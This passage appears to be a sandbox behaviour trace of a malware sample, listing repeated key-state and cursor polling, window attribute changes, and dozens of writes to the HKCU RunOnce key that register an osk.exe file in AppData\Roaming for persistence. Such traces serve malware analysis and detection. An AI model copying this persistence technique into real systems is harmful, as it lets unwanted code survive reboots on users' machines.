| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get window text | window_text = 9822284 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = -16, new_long = -2100363264 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = -20, new_long = 262144 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25820119826 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleacc.dll, function = LresultFromObject, address_out = 0x71faf590 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| System | Get Time | type = Ticks, time = 258203 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258218 |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258218 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Time | type = Ticks, time = 258234 |
|
3 | |
| System | Get Time | type = Performance Ctr, time = 25826118931 |
|
1 | |
| System | Get Time | type = Ticks, time = 258234 |
|
4 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258234 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258234 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258265 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25828887335 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25828894163 |
|
1 | |
| System | Get Time | type = Ticks, time = 258265 |
|
2 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258265 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258265 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 258281 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258281 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 258296 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258296 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 258312 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258312 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:32 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258328 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:32 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258328 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:32 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 258343 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:32 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 258343 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:32 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 258359 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 258781 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:32 (UTC) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 258921 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
